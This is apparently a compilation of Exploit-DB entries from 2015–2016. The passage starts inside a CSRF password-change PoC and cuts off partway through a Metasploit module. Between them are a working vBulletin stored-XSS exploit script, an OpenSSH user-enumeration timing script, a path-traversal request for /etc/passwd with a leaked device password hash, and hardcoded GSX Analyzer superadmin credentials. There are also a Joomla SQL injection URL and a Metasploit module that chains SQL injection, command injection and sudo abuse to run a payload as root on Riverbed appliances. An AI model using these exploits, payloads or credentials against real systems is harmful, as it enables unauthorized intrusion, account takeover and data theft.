"------WebKitFormBoundarywXBZovhmb3VnFJdz\r\n" +
"Content-Disposition: form-data; name=\"password\"\r\n" +
"\r\n" +
"test\r\n" +
"------WebKitFormBoundarywXBZovhmb3VnFJdz\r\n" +
"Content-Disposition: form-data; name=\"reppassword\"\r\n" +
"\r\n" +
"test\r\n" +
"------WebKitFormBoundarywXBZovhmb3VnFJdz\r\n" +
"Content-Disposition: form-data; name=\"avatar\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundarywXBZovhmb3VnFJdz\r\n" +
"Content-Disposition: form-data; name=\"save-info\"\r\n" +
"\r\n" +
"Save\r\n" +
"------WebKitFormBoundarywXBZovhmb3VnFJdz\r\n" +
"Content-Disposition: form-data; name=\"user_id\"\r\n" +
"\r\n" +
"2\r\n" +
"------WebKitFormBoundarywXBZovhmb3VnFJdz--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
#Getting user id
In a published project there is a button contact project owner with the corresponding UID --> url: http://[IP]/my-account/private-messages/?rdr=&pg=send&uid=1&pid=34.
Also a mouseover in the user profile (Feedback) will reveal the userid.
Temporary Workaround and Fix
============================
No fix
History
=======
2015-12-20 Problem discovery during code review
2016-01-12 Vendor contacted
2016-01-12 Vendor response (check in progress)
2016-01-26 Vendor contacted (asked for status update)
2016-01-26 Vendor reponse (check in progress)
2016-02-05 Vendor contacted (advisory will be released in 30 days)
2016-03-07 Vendor contacted (asked for last status update)
2016-03-07 Vendor response (vulnerabilities should be fixed in the last update 2.0.9.7 on 1st march 2016, not verified by the LSE)
2016-03-08 Advisory release
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2
iQIcBAEBCAAGBQJW3ojFAAoJEDgSCSGZ4yd8iQIQAOYTS8WaW0Tkw8JMwssV/N8F
8O6tk4BYAkBbaMhk8rPBZBKcny7hTUiCsfLr7PYby9O3hcLmGMajhhyYg+5jjw1x
XUQc6dsER9UAj7OukUHxqJH2trQvcQfCOQUx7iNgV4lHNfpOGDOBVvZYA/YNE6uF
mUuyoGDdHlE3jE9WVGamsy2t5lrY5HOYXK6ZJkAv79MkeM6Dzdt2VXdZmN4UHzec
NkAm0fvML143dcBt3BsuCsE5AhfBJGOesAUMkE7Z29HTux1fBrNyYs4KhzumSALy
2I7h4WTozJMXBufEZkvqcGA6ikWATr31SzaUGjzyko96whegkNizJhpFqbAwtlZZ
tz32tXjf97c+3mmpKvkHqsln2oPWJrfAEV2q96SlOuevFo38uJSYb31NNZrtfx7I
5FoXr8ZgR98VIxeQcceF021JvM95J0ciLWWLkRYoE3VP1pQz9frrX7QfUU5+QrqT
gCC49pWbeK00aVdlqgc3oquJd8kk4fVZ59HOaNJldQh2BM9isFscbQ8fDmYJna/K
0VzgaoItc0OBR4hLywPi2MEVvHQm3r7Qe4JGsnr1imRg7i84GfbsuYsG8UH/FkDP
4nWQnKcZFTrNzTNQdsvho/P6/d3Efp5zJr+GVkNwI4242yAYHaAfcfy+DzK7vDH+
b3FqvVBebtLXMXwgRwx0
=NlIz
-----END PGP SIGNATURE-----
CVE-2014-2021 - vBulletin 5.x/4.x - persistent XSS in AdminCP/ApiLog via xmlrpc API (post-auth)
================================================================================================
Overview
--------
date : 10/12/2014
cvss : 4.6 (AV:N/AC:H/Au:S/C:P/I:P/A:P) base
cwe : 79
vendor : vBulletin Solutions
product : vBulletin 4
versions affected : latest 4.x and 5.x (to date); verified <= 4.2.2 ; <= 5.0.x
* vBulletin 5.0.5 (verified)
* vBulletin 4.2.2 (verified)
* vBulletin 4.2.1 (verified)
* vBulletin 4.2.0 PL2 (verified)
exploitability :
* remotely exploitable
* requires authentication (apikey)
* requires non-default features to be enabled (API interface, API-Logging)
* requires user interaction to trigger exploit (admincp - admin views logs)
patch availability (to date) : None
Abstract
---------
vBulletin 4/5 does not properly sanitize client provided xmlrpc attributes (e.g. client name)
allowing the remote xmlrpc client to inject code into the xmlrpc API logging page.
Code is executed once an admin visits the API log page and clicks on the API clients name.
risk: rather low - due to the fact that you the api key is required
you can probably use CVE-2014-2023 to obtain the api key
Details
--------
vulnerable component:
./admincp/apilog.php?do=viewclient
apilog.php does not sanitize xmlrpc client provided data before passing it to
print_label_row to generate the output page.
Proof of Concept (PoC)
----------------------
see https://github.com/tintinweb/pub/tree/master/pocs/cve-2014-2021
1) prerequisites
1.1) enable API, generate API-key
logon to AdminCP
goto "vBulletin API"->"API-Key" and enable the API interface, generate key
goto "vBulletin API"->"API-Log" and enable all API logging
2) run PoC
edit PoC to match your TARGET, APIKEY (, optionally DEBUGLEVEL)
run PoC, wait for SUCCESS! message
3) trigger exploit
logon to AdminCP
goto "vBulletin API"->"API-Log" and hit "view"
in search results click on "client name"
the injected msgbox pops up
Timeline
--------
2014-01-14: initial vendor contact - no reply
2014-01-24: vendor contact - no reply
2014-10-13: public disclosure
Contact
--------
tintinweb - https://github.com/tintinweb/pub/tree/master/pocs/cve-2014-2021
(0x721427D8)
- - -
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
@author: tintinweb 0x721427D8
'''
import urllib2, cookielib, urllib, json, hashlib
class Exploit(object):
baseurl = None
cookies = None
def __init__(self,baseurl,params, debuglevel=1):
self.cookies = cookielib.LWPCookieJar()
handlers = [
urllib2.HTTPHandler(debuglevel=debuglevel),
urllib2.HTTPSHandler(debuglevel=debuglevel),
urllib2.HTTPCookieProcessor(self.cookies)
]
self.browser = urllib2.build_opener(*handlers)
self.baseurl=baseurl
self.params = params
def call(self,path="",data={}):
assert(isinstance(data,dict))
data = urllib.urlencode(data)
req = urllib2.Request("%s%s"%(self.baseurl,path),data)
req.add_header("Content-Type", "application/x-www-form-urlencoded")
return self.browser.open(req)
def call_json(self,path=None,data={}):
try:
x=self.call(path,data).read()
print "raw_response", x
resp = json.loads(x)
except urllib2.HTTPError, he:
resp = he.read()
return resp
def vb_init_api(self):
params = {'api_m':'api_init'}
params.update(self.params)
data = self.call_json("?%s"%(urllib.urlencode(params)))
self.session = data
return data
def vb_call(self, params):
api_sig = self._vb_build_api_sig(params)
req_params = self._vb_build_regstring(api_sig)
params.update(req_params)
data = self.call_json("?%s"%(urllib.urlencode(params)),data=params)
if not isinstance(data, dict):
return data
if 'errormessage' in data['response'].keys():
raise Exception(data)
return data
def _ksort(self, d):
ret = []
for key, value in [(k,d[k]) for k in sorted(d.keys())]:
ret.append( "%s=%s"%(key,value))
return "&".join(ret)
def _ksort_urlencode(self, d):
ret = []
for key, value in [(k,d[k]) for k in sorted(d.keys())]:
ret.append( urllib.urlencode({key:value}))
return "&".join(ret)
def _vb_build_api_sig(self, params):
apikey = self.params['apikey']
login_string = self._ksort_urlencode(params)
access_token = str(self.session['apiaccesstoken'])
client_id = str(self.session['apiclientid'])
secret = str(self.session['secret'])
return hashlib.md5(login_string+access_token+client_id+secret+apikey).hexdigest()
def _vb_build_regstring(self, api_sig):
params = {
'api_c':self.session['apiclientid'],
'api_s':self.session['apiaccesstoken'],
'api_sig':api_sig,
'api_v':self.session['apiversion'],
}
return params
if __name__=="__main__":
TARGET = "http://localhost:8008/sectest/vbulletin_5/api.php"
APIKEY = "G4YvWVhp"
DEBUGLEVEL = 0 # 1 to enable request tracking
print "vBulletin 5.x / 4.x - XSS in API"
### 1. XSS
'''
vbulletin: admincp => settings: options => vbulletin API and Mobile Application Options
* enable vbulletin API = yes
* enable API log = yes
xss in:
1) http://xxxx/vb/admincp/apistats.php?do=client
2) click on hex<video><source/**/onerror='alert(1)'>hex
2.1) e.g. http://xxxx/vb/admincp/apilog.php?do=viewclient&apiclientid=1
'''
params = {'clientname':"hex<video><source/**/onerror='alert(/clientname_1/)'>hex1",
'clientversion':"hex<video><source/**/onerror='alert(2)'>hex2",
'platformname':"hex<video><source/**/onerror='alert(3)'>hex3",
'platformversion':"hex<video><source/**/onerror='alert(4)'>hex4",
'uniqueid':"hex<video><source/**/onerror='alert(5)'>hex5",
'apikey':APIKEY}
print "[ 1 ] - xss - inject alert() to admincp"
x = Exploit(baseurl=TARGET,params=params,debuglevel=DEBUGLEVEL)
vars = x.vb_init_api()
print vars
"""
$calls = array(
'methods' => array(
'login_login', 'api_init'
),
'login_login' => array(
'POST' => array(
'vb_login_username' => 'admin',
'vb_login_password' => 'password',
),
),
'api_init' => array(
'sessionhash' => '{session.dbsessionhash}'
)
);
"""
print "[*] GOT SESSIONHASH:",vars.get('sessionhash','<no-sessiohash>')
'''
calls = {'methods':['api_init'],
'api_init':{
'sessionhash':vars['sessionhash']
}}
'''
# just a dummy call
x.vb_call(params={'api_m':'api_forumlist',
'type':'t',
'x':"1"})
print "[ *] SUCCESS! - now make an admin visit %s/admincp/apilog.php?do=viewclient&apiclientid=%s to trigger the XSS :)"%("/".join(TARGET.split("/")[:-1]),vars['apiclientid'])
print "-- quit --"
Source: http://seclists.org/fulldisclosure/2016/Jul/51
--------------------------------------------------------------------
User Enumeration using Open SSHD (<=Latest version).
-------------------------------------------------------------------
Abstract:
-----------
By sending large passwords, a remote user can enumerate users on system that runs SSHD. This problem exists in most
modern configuration due to the fact that it takes much longer to calculate SHA256/SHA512 hash than BLOWFISH hash.
CVE-ID
---------
CVE-2016-6210
Tested versions
--------------------
This issue was tested on : opensshd-7.2p2 ( should be possible on most earlier versions as well).
Fix
-----------------
This issue was reported to OPENSSH developer group and they have sent a patch ( don't know if patch was released yet).
(thanks to 'dtucker () zip com au' for his quick reply and fix suggestion).
Details
----------------
When SSHD tries to authenticate a non-existing user, it will pick up a fake password structure hardcoded in the SSHD
source code. On this hard coded password structure the password hash is based on BLOWFISH ($2) algorithm.
If real users passwords are hashed using SHA256/SHA512, then sending large passwords (10KB) will result in shorter
response time from the server for non-existing users.
Sample code:
----------------
import paramiko
import time
user=raw_input("user: ")
p='A'*25000
ssh = paramiko.SSHClient()
starttime=time.clock()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect('127.0.0.1', username=user,
password=p)
except:
endtime=time.clock()
total=endtime-starttime
print(total)
(Valid users will result in higher total time).
*** please note that if SSHD configuration prohibits root login , then root is not considered as valid user...
*** when TCP timestamp option is enabled the best way to measure the time would be using timestamps from the TCP
packets of the server, since this will eliminate any network delays on the way.
Eddie Harari
- # Exploit Title: clear voyager hotspot IMW-C910W - file disclosure
- # Date: 2016/jul/15
- # Exploit Author: Damaster
- # Vendor Homepage: https://www.sprint.com/
- # Software Link: https://web.archive.org/web/20150526042938/http://www.clearwire.com/downloads/IMW-C910W_V2234_R4383A.bin
- # Version: R4383
-
- poc : http://192.168.1.1/cgi-bin/getlog.cgi?filename=../../etc/passwd
-
- vulnerable Device Software Version : R4383
-
- super user password
- =================
- file : /etc/httpd/super.htpasswd
- content : super:YBfFG25mEAdSg
- =================
#####################################################################################
# Application: Adobe Flash Player
# Platforms: Windows,OSX
# Versions: 22.0.0.192 and earlier
# Author: Sébastien Morin of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @COSIG_
# Date: July 12, 2016
# CVE-2016-4175
# COSIG-2016-22
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
================
1) Introduction
================
Adobe Flash Player (labeled Shockwave Flash in Internet Explorer and Firefox) is a freeware software for using content created on the Adobe Flash platform, including viewing multimedia, executing rich Internet applications, and streaming video and audio. Flash Player can run from a web browser as a browser plug-in or on supported mobile devices. Flash Player was created by Macromedia and has been developed and distributed by Adobe Systems since Adobe acquired Macromedia.
(https://en.wikipedia.org/wiki/Adobe_Flash_Player)
#####################################################################################
====================
2) Report Timeline
====================
2016-05-10: Sébastien Morin of COSIG report this vulnerability to Adobe PSIRT;
2016-06-08: Adobe PSIRT confirm this vulnerability;
2016-07-12: Adobe publish a patch (APSB16-25);
2016-07-12: Advisory released by COSIG;
#####################################################################################
=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute malicious code or access to a part of the dynamically allocated memory using a user interaction
visiting a Web page or open a specially crafted SWF file, which contains ‘DefineSprite’ invalid data.
#####################################################################################
===========
4) POC:
===========
https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-22-1.zip
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40103.zip
####################################################################################
#####################################################################################
# Application: Adobe Acrobat Reader DC
# Platforms: Windows,OSX
# Versions: 15.016.20045 and earlier
# Author: Sébastien Morin of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @COSIG_
# Date: July 12, 2016
# CVE: CVE-2016-4203
# COSIG-2016-28
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
================
1) Introduction
================
Adobe Acrobat is a family of application software and Web services developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF).
(https://en.wikipedia.org/wiki/Adobe_Acrobat)
#####################################################################################
====================
2) Report Timeline
====================
2016-05-18: Sébastien Morin of COSIG report this vulnerability to Adobe PSIRT;
2016-06-08: Adobe PSIRT confirm this vulnerability;
2016-07-12: Adobe fixed the issue (APSB16-26);
2016-07-12: Advisory released by COSIG;
#####################################################################################
=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute malicious code or access to part of dynamically allocated memory using a user interaction
that opens a specially crafted PDF file containing an invalid font (.ttf ) including invalid data.
#####################################################################################
===========
4) POC
===========
https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-28.pdf
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40097.zip
####################################################################################
#####################################################################################
# Application: Adobe Acrobat Reader DC
# Platforms: Windows,OSX
# Versions: 15.016.20045 and earlier
# Author: Sébastien Morin of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @COSIG_
# Date: July 12, 2016
# CVE: CVE-2016-4207
# COSIG-2016-26
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
================
1) Introduction
================
Adobe Acrobat is a family of application software and Web services developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF).
(https://en.wikipedia.org/wiki/Adobe_Acrobat)
#####################################################################################
====================
2) Report Timeline
====================
2016-05-18: Sébastien Morin of COSIG report this vulnerability to Adobe PSIRT;
2016-06-08: Adobe PSIRT confirm this vulnerability;
2016-07-12: Adobe fixed the issue (APSB16-26);
2016-07-12: Advisory released by COSIG;
#####################################################################################
=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute malicious code or access to part of dynamically allocated memory using a user interaction
that opens a specially crafted PDF file containing an invalid font (.ttf ) including invalid data.
#####################################################################################
===========
4) POC
===========
https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-26.pdf
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40099.zip
####################################################################################
#####################################################################################
# Application: Adobe Acrobat Reader DC
# Platforms: Windows,OSX
# Versions: 15.016.20045 and earlier
# Author: Sébastien Morin of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @COSIG_
# Date: July 12, 2016
# CVE: CVE-2016-4208
# COSIG-2016-27
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
================
1) Introduction
================
Adobe Acrobat is a family of application software and Web services developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF).
(https://en.wikipedia.org/wiki/Adobe_Acrobat)
#####################################################################################
====================
2) Report Timeline
====================
2016-05-18: Sébastien Morin of COSIG report this vulnerability to Adobe PSIRT;
2016-06-08: Adobe PSIRT confirm this vulnerability;
2016-07-12: Adobe fixed the issue (APSB16-26);
2016-07-12: Advisory released by COSIG;
#####################################################################################
=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute malicious code or access to part of dynamically allocated memory using a user interaction
that opens a specially crafted PDF file containing an invalid font (.ttf ) including invalid data.
#####################################################################################
===========
4) POC
===========
https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-27.pdf
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40098.zip
####################################################################################
#####################################################################################
# Application: Adobe Acrobat Reader DC
# Platforms: Windows,OSX
# Versions: 15.016.20045 and earlier
# Author: Sébastien Morin of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @COSIG_
# Date: July 12, 2016
# CVE: CVE-2016-4206
# COSIG-2016-25
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
================
1) Introduction
================
Adobe Acrobat is a family of application software and Web services developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF).
(https://en.wikipedia.org/wiki/Adobe_Acrobat)
#####################################################################################
====================
2) Report Timeline
====================
2016-05-18: Sébastien Morin of COSIG report this vulnerability to Adobe PSIRT;
2016-06-08: Adobe PSIRT confirm this vulnerability;
2016-07-12: Adobe fixed the issue (APSB16-26);
2016-07-12: Advisory released by COSIG;
#####################################################################################
=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute malicious code or access to part of dynamically allocated memory using a user interaction
that opens a specially crafted PDF file containing an invalid font (.ttf ) including invalid data.
#####################################################################################
===========
4) POC
===========
https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-25.pdf
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40100.zip
####################################################################################
#####################################################################################
# Application: Adobe Acrobat Reader DC
# Platforms: Windows,OSX
# Versions: 15.016.20045 and earlier
# Author: Sébastien Morin of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @COSIG_
# Date: July 12, 2016
# CVE: CVE-2016-4201
# COSIG-2016-24
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
================
1) Introduction
================
Adobe Acrobat is a family of application software and Web services developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF).
(https://en.wikipedia.org/wiki/Adobe_Acrobat)
#####################################################################################
====================
2) Report Timeline
====================
2016-05-18: Sébastien Morin of COSIG report this vulnerability to Adobe PSIRT;
2016-06-08: Adobe PSIRT confirm this vulnerability;
2016-07-12: Adobe fixed the issue (APSB16-26);
2016-07-12: Advisory released by COSIG;
#####################################################################################
=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute malicious code or access to part of dynamically allocated memory using a user interaction
that opens a specially crafted PDF file containing an invalid font (.ttf ) including invalid data.
#####################################################################################
===========
4) POC
===========
https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-24.pdf
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40101.zip
####################################################################################
#####################################################################################
# Application: Adobe Flash Player
# Platforms: Windows,OSX
# Versions: 22.0.0.192 and earlier
# Author: Sébastien Morin of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @COSIG_
# Date: July 12, 2016
# CVE-2016-4179
# COSIG-2016-23
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
================
1) Introduction
================
Adobe Flash Player (labeled Shockwave Flash in Internet Explorer and Firefox) is a freeware software for using content created on the Adobe Flash platform, including viewing multimedia, executing rich Internet applications, and streaming video and audio. Flash Player can run from a web browser as a browser plug-in or on supported mobile devices.[7] Flash Player was created by Macromedia and has been developed and distributed by Adobe Systems since Adobe acquired Macromedia.
(https://en.wikipedia.org/wiki/Adobe_Flash_Player)
#####################################################################################
============================
2) Rapport de Coordination
============================
2016-05-14: Sébastien Morin of COSIG report this vulnerability to Adobe PSIRT;
2016-06-08: Adobe PSIRT confirm this vulnerability;
2016-07-12: Adobe publish a patch (APSB16-25);
2016-07-12: Advisory released by COSIG;
#####################################################################################
=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute malicious code or access to a part of the dynamically allocated memory using a user interaction
visiting a Web page or open a specially crafted SWF file, which contains “DefineBitsJPEG2” invalid data.
#####################################################################################
===========
4) POC:
===========
https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-23.zip
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40102.zip
####################################################################################
# Exploit Title: GSX Analyzer hardcoded superadmin credentials in Main.swf
# Google Dork: inurl:"/Main.swf?cachebuster=" (need to manually look for stringtitle "Loading GSX Analyzer ... 0%")
# Date: 12-07-16
# Exploit Author: ndevnull
# Vendor Homepage: http://www.gsx.com/products/gsx-analyzer
# Software Link: http://www.gsx.com/download-the-trial-ma
# Version: 10.12, but also found in version 11
# Tested on: Windows Server 2008
# CERT : VR-241
# CVE :
1. Description
After decompiling the SWF file "Main.swf", a hardcoded credential in one of the products of GSX, namely GSX Analyzer, has been found. Credential is a superadmin account, which is not listed as a user in the userlist, but can be used to login GSX Analyzer portals. Seemingly a backdoor or a "solution" to provide "support" from the vendor.
The found credentials are:
Username: gsxlogin
Password: gsxpassword
2. Proof of Concept
A few sites externally on the internet are affected by this incident. Presumably all of the externally disclosed GSX analyzer portals have this vulnerability.
Code snippet:
-----------------
if ((((event.getLogin().toLowerCase() == "gsxlogin")) && ((event.getPwd() == "gsxpassword")))){
-----------------
3. Solution:
Vendor has been informed on 12-06-16, also CERT has been notified with ID VR-241
# Exploit Title: Joomla Guru Pro (com_guru) Component - SQL Injection
# Exploit Author: s0nk3y
# Date: 14/07/2016
# Vendor Homepage: https://www.ijoomla.com
# Software Link: https://www.ijoomla.com/component/digistore/products/47-joomla-add-ons/119-guru-pro/189?Itemid=189
# Category: webapps
# Version: All
# Tested on: Ubuntu 16.04
1. Description
Turn your knowledge into dollars! Sell Your Courses Today!
Guru, allows you to create online courses easily! We believe that everyone is an expert in something. If you know something that others don't, there is no better time to profit from it. You can create a course about your topic and start generating income.
2. Proof of Concept
Itemid Parameter Vulnerable To SQL Injection
com_guru&view=gurupcategs&layout=view&Itemid=[SQL Injection]&lang=en
Demo :
http://server/index.php?option=com_guru&view=gurupcategs&layout=view&Itemid=123%27&lang=en
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
require 'digest'
def initialize(info={})
super(update_info(info,
'Name' => "Riverbed SteelCentral NetProfiler/NetExpress Remote Code Execution",
'Description' => %q{
This module exploits three separate vulnerabilities found in the Riverbed SteelCentral NetProfiler/NetExpress
virtual appliances to obtain remote command execution as the root user. A SQL injection in the login form
can be exploited to add a malicious user into the application's database. An attacker can then exploit a
command injection vulnerability in the web interface to obtain arbitrary code execution. Finally, an insecure
configuration of the sudoers file can be abused to escalate privileges to root.
},
'License' => MSF_LICENSE,
'Author' => [ 'Francesco Oddo <francesco.oddo[at]security-assessment.com>' ],
'References' =>
[
[ 'URL', 'http://www.security-assessment.com/files/documents/advisory/Riverbed-SteelCentral-NetProfilerNetExpress-Advisory.pdf' ]
],
'Platform' => 'linux',
'Arch' => ARCH_X86_64,
'Stance' => Msf::Exploit::Stance::Aggressive,
'Targets' =>
[
[ 'Riverbed SteelCentral NetProfiler 10.8.7 / Riverbed NetExpress 10.8.7', { }]
],
'DefaultOptions' =>
{
'SSL' => true
},
'Privileged' => false,
'DisclosureDate' => "Jun 27 2016",
'DefaultTarget' => 0
))
register_options(
[
OptString.new('TARGETURI', [true, 'The target URI', '/']),
OptString.new('RIVERBED_USER', [true, 'Web interface user account to add', 'user']),
OptString.new('RIVERBED_PASSWORD', [true, 'Web interface user password', 'riverbed']),
OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the payload request', 10]),
Opt::RPORT(443)
],
self.class
)
end
def check
json_payload_check = "{\"username\":\"check_vulnerable%'; SELECT PG_SLEEP(2)--\", \"password\":\"pwd\"}";
# Verifies existence of login SQLi
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,'/api/common/1.0/login'),
'ctype' => 'application/json',
'encode_params' => false,
'data' => json_payload_check
})
if res && res.body && res.body.include?('AUTH_DISABLED_ACCOUNT')
return Exploit::CheckCode::Vulnerable
end
Exploit::CheckCode::Safe
end
def exploit
print_status("Attempting log in to target appliance")
@sessid = do_login
print_status("Confirming command injection vulnerability")
test_cmd_inject
vprint_status('Ready to execute payload on appliance')
@elf_sent = false
# Generate payload
@pl = generate_payload_exe
if @pl.nil?
fail_with(Failure::BadConfig, 'Please select a valid Linux payload')
end
# Start the server and use primer to trigger fetching and running of the payload
begin
Timeout.timeout(datastore['HTTPDELAY']) { super }
rescue Timeout::Error
end
end
def get_nonce
# Function to get nonce from login page
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path,'/index.php'),
})
if res && res.body && res.body.include?('nonce_')
html = res.get_html_document
nonce_field = html.at('input[@name="nonce"]')
nonce = nonce_field.attributes["value"]
else
fail_with(Failure::Unknown, 'Unable to get login nonce.')
end
# needed as login nonce is bounded to preauth SESSID cookie
sessid_cookie_preauth = (res.get_cookies || '').scan(/SESSID=(\w+);/).flatten[0] || ''
return [nonce, sessid_cookie_preauth]
end
def do_login
uname = datastore['RIVERBED_USER']
passwd = datastore['RIVERBED_PASSWORD']
nonce, sessid_cookie_preauth = get_nonce
post_data = "login=1&nonce=#{nonce}&uname=#{uname}&passwd=#{passwd}"
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,'/index.php'),
'cookie' => "SESSID=#{sessid_cookie_preauth}",
'ctype' => 'application/x-www-form-urlencoded',
'encode_params' => false,
'data' => post_data
})
# Exploit login SQLi if credentials are not valid.
if res && res.body && res.body.include?('<form name="login"')
print_status("Invalid credentials. Creating malicious user through login SQLi")
create_user
nonce, sessid_cookie_preauth = get_nonce
post_data = "login=1&nonce=#{nonce}&uname=#{uname}&passwd=#{passwd}"
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,'/index.php'),
'cookie' => "SESSID=#{sessid_cookie_preauth}",
'ctype' => 'application/x-www-form-urlencoded',
'encode_params' => false,
'data' => post_data
})
sessid_cookie = (res.get_cookies || '').scan(/SESSID=(\w+);/).flatten[0] || ''
print_status("Saving login credentials into Metasploit DB")
report_cred(uname, passwd)
else
print_status("Valid login credentials provided. Successfully logged in")
sessid_cookie = (res.get_cookies || '').scan(/SESSID=(\w+);/).flatten[0] || ''
print_status("Saving login credentials into Metasploit DB")
report_cred(uname, passwd)
end
return sessid_cookie
end
def report_cred(username, password)
# Function used to save login credentials into Metasploit database
service_data = {
address: rhost,
port: rport,
service_name: ssl ? 'https' : 'http',
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
module_fullname: self.fullname,
origin_type: :service,
username: username,
private_data: password,
private_type: :password
}.merge(service_data)
credential_core = create_credential(credential_data)
login_data = {
core: credential_core,
last_attempted_at: DateTime.now,
status: Metasploit::Model::Login::Status::SUCCESSFUL
}.merge(service_data)
create_credential_login(login_data)
end
def create_user
# Function exploiting login SQLi to create a malicious user
username = datastore['RIVERBED_USER']
password = datastore['RIVERBED_PASSWORD']
usr_payload = generate_sqli_payload(username)
pwd_hash = Digest::SHA512.hexdigest(password)
pass_payload = generate_sqli_payload(pwd_hash)
uid = rand(999)
json_payload_sqli = "{\"username\":\"adduser%';INSERT INTO users (username, password, uid) VALUES ((#{usr_payload}), (#{pass_payload}), #{uid});--\", \"password\":\"pwd\"}";
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,'/api/common/1.0/login'),
'ctype' => 'application/json',
'encode_params' => false,
'data' => json_payload_sqli
})
json_payload_checkuser = "{\"username\":\"#{username}\", \"password\":\"#{password}\"}";
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,'/api/common/1.0/login'),
'ctype' => 'application/json',
'encode_params' => false,
'data' => json_payload_checkuser
})
if res && res.body && res.body.include?('session_id')
print_status("User account successfully created, login credentials: '#{username}':'#{password}'")
else
fail_with(Failure::UnexpectedReply, 'Unable to add user to database')
end
end
def generate_sqli_payload(input)
# Function to generate sqli payload for user/pass in expected format
payload = ''
input_array = input.strip.split('')
for index in 0..input_array.length-1
payload = payload << 'CHR(' + input_array[index].ord.to_s << ')||'
end
# Gets rid of the trailing '||' and newline
payload = payload[0..-3]
return payload
end
def test_cmd_inject
post_data = "xjxfun=get_request_key&xjxr=1457064294787&xjxargs[]=Stoken; id;"
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,'/index.php?page=licenses'),
'cookie' => "SESSID=#{@sessid}",
'ctype' => 'application/x-www-form-urlencoded',
'encode_params' => false,
'data' => post_data
})
unless res && res.body.include?('uid=')
fail_with(Failure::UnexpectedReply, 'Could not inject command, may not be vulnerable')
end
end
def cmd_inject(cmd)
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,'/index.php?page=licenses'),
'cookie' => "SESSID=#{@sessid}",
'ctype' => 'application/x-www-form-urlencoded',
'encode_params' => false,
'data' => cmd
})
end
# Deliver payload to appliance and make it run it
def primer
# Gets the autogenerated uri
payload_uri = get_uri
root_ssh_key_private = rand_text_alpha_lower(8)
binary_payload = rand_text_alpha_lower(8)
print_status("Privilege escalate to root and execute payload")
